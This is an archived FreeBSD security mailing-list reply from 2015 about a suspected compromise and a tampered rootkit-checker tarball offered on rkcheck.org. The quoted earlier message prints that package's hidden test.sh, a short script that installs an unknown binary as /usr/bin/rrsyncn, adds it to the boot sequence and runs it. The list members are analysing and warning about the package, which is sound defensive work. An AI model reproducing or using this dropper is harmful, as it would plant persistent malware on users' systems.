Date: Wed, 25 Feb 2015 17:07:05 -0400 From: Joseph Mingrone <jrm@ftfl.ca> To: freebsd-security@freebsd.org Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <864mq9ya2u.fsf@gly.ftfl.ca> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
next in thread | previous in thread | raw e-mail | index | archive | help
Christopher Schulte <christopher@schulte.org> writes: >> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >> which was registered a few days ago and looks like a tampered version of >> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >> rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit Are you looking at the tarball from the "source code" link, http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz? % tar -xvf rkcheck-1.4.3-src.tar.gz x rkcheck/ x rkcheck/chkdirs.c x rkcheck/README.chklastlog x rkcheck/README.chkwtmp x rkcheck/chkutmp.c x rkcheck/chkrootkit x rkcheck/chkrootkit.lsm x rkcheck/check_wtmpx.c x rkcheck/COPYRIGHT x rkcheck/strings.c x rkcheck/ifpromisc.c x rkcheck/ACKNOWLEDGMENTS x rkcheck/chklastlog.c: truncated gzip input tar: Error exit delayed from previous errors. I don't see a /tests/ directory or any directory under rkcheck. Joseph
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?864mq9ya2u.fsf>